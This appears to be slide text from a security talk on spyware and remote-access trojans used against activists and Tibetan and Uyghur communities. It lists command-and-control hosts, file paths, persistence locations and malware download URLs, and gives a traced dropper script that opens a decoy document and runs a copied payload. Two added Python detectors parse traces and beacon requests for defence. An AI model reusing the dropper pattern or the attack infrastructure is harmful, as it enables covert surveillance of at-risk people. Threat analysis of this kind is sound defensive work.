Targeted attacks on activists
David Barroso
Telefonica Digital
Uyghur
http://surveillance.rsf.org/es/
https://tails.boum.org
Source: CitizenLab.org
 FinFisher – Gamma Group
 Installs a driver
 Modifies the MBR
 Injects itself into legitimate processes (winlogon.exe, svchost.exe)
 Packer & anti-debugging
 AES-256-CBC
 C2: 77.69.140.194 (Bahrain) Ports: 22, 53, 80, 443, 4111
 FinFisher – Gamma Group
Bypassing of 40 regularly tested Antivirus Systems
Covert Communication with Headquarters
Full Skype Monitoring (Calls, Chats, File Transfers, Video, Contact List)
Recording of common communication like Email, Chats and Voice-over-IP
Live Surveillance through Webcam and Microphone
Country Tracing of Target
Silent Extracting of Files from Hard-Disk
Process-based Key-logger for faster analysis
Live Remote Forensics on Target System
Advanced Filters to record only important information
Supports most common Operating Systems (Windows, Mac OSX and Linux)
Source: Rapid7
Source: CitizenLab.org
 FinFisher – Gamma Group
 iOS version: install_manager.app
 Installed via a 'provisioning profile' (UDID required)
 Certificate: Martin Muench (Managing Director)
 /System/Library/LaunchDaemons/com.apple.logind.plist
 'Drops' SyncData.app
 Steals contacts, SMS, call history, geolocation, etc.
 Base64
 Versions for Android, Symbian, BlackBerry
Source: CitizenLab.org
 Mamfakinch.com
Please don't mention my name or anything at all, I don't want any trouble…
http://freeme.eu5.org/scandale%20(2).doc
 Hacking Team – RCS
 OSX.Crisis / W32.Crisis
 File adobe.jar -> Mac and Win32 versions
 Win32: CurrentVersion/Run. Process infection
 Infects VMware images
Source: Symantec
Uyghur
Concerns over Uyghur People.doc
Hosh Hewer.doc
Jenwediki yighingha iltimas qilish Jediwili.doc
list.doc
Press Release on Commemorat the Day of Mourning.doc
The Universal Declaration of Human Rights and the Unrecognized Population Groups.doc
Uyghur Political Prisoner.doc
2013-02-04 - Deported Uyghurs.doc
Jenwediki yighingha iltimas qilish Jediwili(Behtiyar Omer).doc
Kadeer Logistics detail.doc
Source: Kaspersky
 Word for Mac vulnerability CVE-2012-0158
 Opens the real document and runs the binary
 Keylogger, machine information, remote control
 LaunchDaemon 'systm'
 Tiny Shell
 AES (12345678) and SHA1
 'me' as contact
 C2: update.googmail.org (207.204.245.192)
1154/0x2610: fstat(0x26, 0xBFFF4CD0, 0x200) = 0 0
1154/0x2610: lseek(0x26, 0x6600, 0x0) = 26112 0
1154/0x2610: open("/tmp/l.sh\0", 0x602, 0x1FF) = 40 0
1154/0x2610: open("/tmp/l\0", 0x602, 0x1FF) = 41 0
1154/0x2610: open("/tmp/l.doc\0", 0x602, 0x1FF) = 42 0
1154/0x2610: read(0x26, "#!/bin/bash\nsleep 1\n/usr/bin/open /tmp/l.doc\ncp /tmp/l /tmp/m\n/tmp/m\0", 0x44) = 68 0
1154/0x2610: write(0x28, "#!/bin/bash\nsleep 1\n/usr/bin/open /tmp/l.doc\ncp /tmp/l /tmp/m\n/tmp/m\0", 0x44) = 68 0
Source: AlienVault
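The dtruss excerpt above is the whole story of the dropper in a few syscalls: three files are opened under /tmp, and a shell script is written that opens the decoy document and then executes the payload it copied. The following Python is an added example (not from the slides or from AlienVault) of how a defender can turn such a trace into a finding: it parses dtruss-style lines, maps descriptors returned by open() back to paths, reassembles what was written to each one, and flags a script in /tmp that opens a dropped decoy and references another dropped file, or a Mach-O header being written to /tmp. The trace it runs on is constructed to mirror the slide's format; the descriptor numbers and the extra Mach-O/OLE writes are illustrative.

```python
import re
from typing import Dict, List

# One dtruss line: "PID/THREAD: syscall(args) = ret errno"
LINE_RE = re.compile(
    r'^(?P<pid>\d+)/(?P<tid>0x[0-9A-Fa-f]+):\s+(?P<call>\w+)\((?P<args>.*)\)'
    r'\s*=\s*(?P<ret>-?\d+)\s+(?P<err>\d+)\s*$')

# Constructed dtruss excerpt modelled on the trace in the slides. The fd numbers and the
# Mach-O / OLE header writes are illustrative, not a capture of the real sample.
SAMPLE_TRACE = r'''
1154/0x2610: fstat(0x26, 0xBFFF4CD0, 0x200) = 0 0
1154/0x2610: lseek(0x26, 0x6600, 0x0) = 26112 0
1154/0x2610: open("/tmp/l.sh\0", 0x602, 0x1FF) = 40 0
1154/0x2610: open("/tmp/l\0", 0x602, 0x1FF) = 41 0
1154/0x2610: open("/tmp/l.doc\0", 0x602, 0x1FF) = 42 0
1154/0x2610: write(0x28, "#!/bin/bash\nsleep 1\n/usr/bin/open /tmp/l.doc\ncp /tmp/l /tmp/m\n/tmp/m\0", 0x44) = 68 0
1154/0x2610: write(0x29, "\xcf\xfa\xed\xfe\x07\0", 0x6) = 6 0
1154/0x2610: write(0x2A, "\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\0", 0x8) = 8 0
'''

# Mach-O 64-bit, Mach-O 32-bit and fat-binary magics as they appear on disk.
MACHO_MAGICS = (b'\xcf\xfa\xed\xfe', b'\xce\xfa\xed\xfe', b'\xca\xfe\xba\xbe')


def split_args(args: str) -> List[str]:
    """Split a dtruss argument list on commas that sit outside double quotes."""
    out, cur, in_str, i = [], '', False, 0
    while i < len(args):
        ch = args[i]
        if ch == '\\' and in_str and i + 1 < len(args):
            cur += args[i:i + 2]          # keep escape sequences intact for decode_string()
            i += 2
            continue
        if ch == '"':
            in_str = not in_str
        if ch == ',' and not in_str:
            out.append(cur.strip())
            cur = ''
        else:
            cur += ch
        i += 1
    if cur.strip():
        out.append(cur.strip())
    return out


def decode_string(arg: str) -> bytes:
    """Turn a dtruss-quoted string ("...\n...\0") back into the raw bytes it stands for."""
    s = arg[1:-1] if arg.startswith('"') and arg.endswith('"') else arg
    simple = {'n': b'\n', 't': b'\t', 'r': b'\r', '0': b'\x00', '\\': b'\\', '"': b'"'}
    out, i = bytearray(), 0
    while i < len(s):
        if s[i] == '\\' and i + 1 < len(s):
            nxt = s[i + 1]
            if nxt == 'x' and i + 3 < len(s):
                out += bytes([int(s[i + 2:i + 4], 16)])
                i += 4
                continue
            if nxt in simple:
                out += simple[nxt]
                i += 2
                continue
        out += s[i].encode('latin-1')
        i += 1
    return bytes(out)


def reconstruct_writes(trace: str) -> Dict[str, bytes]:
    """Map every path opened in the trace to the bytes later written to its descriptor."""
    fd_to_path: Dict[int, str] = {}
    written: Dict[str, bytes] = {}
    for line in trace.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        args = split_args(m['args'])
        if m['call'] == 'open' and int(m['ret']) >= 0:
            path = decode_string(args[0]).rstrip(b'\x00').decode('latin-1')
            fd_to_path[int(m['ret'])] = path
            written.setdefault(path, b'')
        elif m['call'] == 'write' and int(args[0], 0) in fd_to_path:
            data = decode_string(args[1])
            if data.endswith(b'\x00'):      # dtruss prints the terminating NUL; it is not written
                data = data[:-1]
            written[fd_to_path[int(args[0], 0)]] += data
        elif m['call'] == 'close':
            fd_to_path.pop(int(args[0], 0), None)
    return written


def find_decoy_droppers(written: Dict[str, bytes]) -> List[Dict[str, str]]:
    """Flag a /tmp script that opens a dropped decoy and references another dropped file,
    and any Mach-O executable written to /tmp."""
    findings = []
    for path, data in written.items():
        if not path.startswith('/tmp/'):
            continue
        if data.startswith(b'#!'):
            text = data.decode('latin-1', errors='replace')
            tokens = set(re.findall(r'\S+', text))
            m = re.search(r'(?:^|\s)(?:/usr/bin/)?open\s+(\S+)', text)
            decoy = m.group(1) if m else None
            others = [p for p in written if p not in (path, decoy)]
            if decoy in written and any(p in tokens for p in others):
                findings.append({'path': path, 'reason': 'script opens dropped decoy and references another dropped file'})
        elif data[:4] in MACHO_MAGICS:
            findings.append({'path': path, 'reason': 'Mach-O executable written to /tmp'})
    return findings


if __name__ == '__main__':
    for finding in find_decoy_droppers(reconstruct_writes(SAMPLE_TRACE)):
        print(finding)
```

The same parser works on a live `sudo dtruss -f -p <pid>` capture as long as the lines keep the `PID/THREAD: call(args) = ret errno` shape; the NUL-stripping only removes the single terminator dtruss appends, so binary payloads are reassembled intact.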
Targeted Attacks
LURK/Gh0stRAT
Source: CitizenLab.org
Dalai Lama
Source: Kaspersky
 Word for Mac vulnerability CVE-2012-0158
 Opens the real document and runs the binary
 Keylogger, machine information, remote control
 Digitally signed binary
 C2: 61.178.77.76 TCP/1080
Source: Kaspersky
Source: Symantec
Source: CitizenLab.org
 MSWORD vulnerability CVE-2012-0158
 Opens the real document and runs the binary
 Keylogger, machine information, remote control
 Digitally signed binary
 C2: 114.142.147.51
Metadata        Original                            Dropped
MD5             8882c40ef1786efb98ea251e247bfbee    40f41c077e03d72a39eb1bd7bf6e3341
Last saved by   HSwallow                            lebrale
Creation date   Tue., Jun. 12 09:11:00 2012         Wed., Jun. 13 11:39:00 2012
Last save date  Tue., Jun. 12 09:11:00 2012         Wed., Jun. 13 11:39:00 2012
Source: CitizenLab.org
 APT1 / GOGGLES vs GLASSES
 Application pretends to be a folder
 Installs a non-malicious PDF (job posting in Nepal) and a binary spkptdhv.exe in %temp% that registers itself in the registry
 Commands: sleep / download & run
GET /ewpindex.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; Clj26Dbj.XYZ)
Host: ewplus.com
Cache-Control: no-cache
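The beacon above hides its identifier inside the User-Agent comment, where proxies and most signatures never look. The Python below is an added example (not from the slides or CitizenLab) of a proxy-log check for that trick: it parses a raw HTTP request, splits the parenthesised User-Agent comment into tokens, and reports any token that is not one a Windows IE/Trident build would emit, plus the inverted "Windows NT ... ; MSIE" order the slide's request shows (genuine IE lists MSIE first; treating the inversion as a signal is a heuristic assumed here). The two requests are constructed: the first mirrors the slide, the second is a normal-looking IE7 request for comparison.

```python
import re
from typing import Dict, List

# Comment tokens that legitimately appear inside an IE/Trident User-Agent string.
KNOWN_TOKENS = [re.compile(p) for p in (
    r'^compatible$', r'^MSIE \d+\.\d+$', r'^Windows NT \d+\.\d+$', r'^Trident/\d+\.\d+$',
    r'^WOW64$', r'^Win64$', r'^x64$', r'^SV1$', r'^\.NET CLR \d+\.\d+(\.\d+)?$',
    r'^\.NET4\.\d[CE]$', r'^Media Center PC \d+\.\d+$', r'^SLCC\d$', r'^InfoPath\.\d$',
)]

# Constructed samples: the first mirrors the GOGGLES beacon shown in the slides,
# the second is a genuine-looking IE7 request used as a control.
BEACON_REQUEST = """GET /ewpindex.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; Clj26Dbj.XYZ)
Host: ewplus.com
Cache-Control: no-cache
"""

NORMAL_REQUEST = """GET /index.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Host: www.example.com
"""


def parse_request(raw: str) -> Dict[str, object]:
    """Split a raw HTTP/1.x request into its request line and a lower-cased header map."""
    lines = raw.strip().splitlines()
    method, target, version = lines[0].split()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return {'method': method, 'target': target, 'version': version, 'headers': headers}


def ua_comment_tokens(ua: str) -> List[str]:
    """Return the ';'-separated tokens inside the first parenthesised UA comment."""
    m = re.search(r'\(([^)]*)\)', ua)
    return [t.strip() for t in m.group(1).split(';') if t.strip()] if m else []


def odd_ua_tokens(ua: str) -> List[str]:
    """Tokens that match none of the known IE comment tokens (the beacon id lives here)."""
    return [t for t in ua_comment_tokens(ua) if not any(rx.match(t) for rx in KNOWN_TOKENS)]


def msie_before_windows(ua: str) -> bool:
    """Heuristic: genuine IE emits 'MSIE x.y' before 'Windows NT x.y'. True means the order is normal."""
    tokens = ua_comment_tokens(ua)
    idx = {t.split(' ')[0]: i for i, t in enumerate(tokens)}
    if 'MSIE' not in idx or 'Windows' not in idx:
        return True
    return idx['MSIE'] < idx['Windows']


def assess_request(raw: str) -> Dict[str, object]:
    """Assess one request: unknown UA tokens and inverted token order are both reported."""
    req = parse_request(raw)
    headers = req['headers']
    ua = str(headers.get('user-agent', ''))
    odd = odd_ua_tokens(ua)
    order_ok = msie_before_windows(ua)
    return {
        'host': headers.get('host', ''),
        'target': req['target'],
        'odd_tokens': odd,
        'token_order_ok': order_ok,
        'suspicious': bool(odd) or not order_ok,
    }


if __name__ == '__main__':
    for raw in (BEACON_REQUEST, NORMAL_REQUEST):
        print(assess_request(raw))
```

Run over a proxy export, the odd-token list is what an analyst pivots on: a token that is constant across many hosts but absent from any browser build is a campaign marker, while a token that differs per host (as the 8-character string here suggests) is a per-victim id and worth correlating with the Host and path.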
Android
Source: CitizenLab.org
 Spoofed From address
 Tibetans generally 'root' their Android devices to install fonts
 They also sideload APKs because of Google Play restrictions
 Modified apps
 Intercepts SMS to report the device's position
 Steals call history, SMS and contacts
 C2 android.uyghur.dnsd.me
Source: CitizenLab.org
Source: Kaspersky
 Theft of contacts, SMS, call history and phone data
 C2: Base64 to 64.78.161.133
Source: Kaspersky
Anything goes
Source: https://malwarelab.zendesk.com
http://unremote.org
 Capture webcam activity
 Disable the notification setting for certain antivirus programs
 Download and execute arbitrary programs and commands
 Modify the hosts file
 Record key strokes
 Retrieve system information about the computer
 Start or end processes
 Steal passwords
 Update itself
 %Temp%\dclogs\[CURRENT DAY]-[RANDOM NUMBER].dc
 %UserProfile%\Start Menu\Programs\Startup\(Empty).lnk
 Author: DarkCoderSc
 Date: 2008
 Current version: 5
 Regrets what happened, and offers an uninstaller
Social engineering
Source: Trendmicro
Source: EFF
Malware
Source: EFF
 DarkComet RAT
 C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\(Empty).lnk
 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.pdf
 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Explorer.exe
 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\msdlg.ocx
 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dclogs
Source: EFF
 [] Aleppo Team
 [] Aleppo Team
rar
 [29/05/2012 18:03:44] Aleppo Team | | ...: Last
modified plan Aleppo time for Jihad
 [29/05/2012 18:03:46] Aleppo Team | | ...:
Send the file "plan eventually 2.rar"
Source: EFF
 C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\(empty).lnk
 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\explorer.exe
 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Aleppo plan.pdf
 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Firefox.dll
Skype encryption
Source: EFF
 DarkComet RAT
 http://skype-encryption.sytes.net/
 http://216.6.0.28/SkypeEncryption/Download/skype.exe
Antihacker
73%
Source: EFF
 DarkComet RAT
 Connects to 216.6.0.28/google.exe
 Keylogger: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dclogs.sys
 C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\..lnk
BlackShades
73%
Source: EFF
http://bshades.eu/bsscmds.php
With Blackshades Remote Controller you can:
- Control several computers at once, performing tasks ranging from viewing their screens to uploading/downloading files from them
- Perform maintenance on a Network
- Help a client out by using the screen capture feature, even if they are on the other side of the world
- Monitor a specific PC, recording the keystrokes and remotely managing the files
- Access your computer that you have at home if you are on holiday
- Monitor the computers of students and their activity while teaching a computing lesson
- Chat with clients that you are connected to
 Compromised Skype accounts
 .PIF file
 'Windows Messanger' – adds a firewall exception, Startup entry
 C2: alosh66.myftp.org (31.9.170.140) 4444/TCP
 OSX.Kitm (Kumar in the mac)
 Rajinder Kumar
 OSX/Filesteal – OSX/HackBack
Source: F-Secure
Thanks
David Barroso
@lostinsecurity

Targeted attacks against activists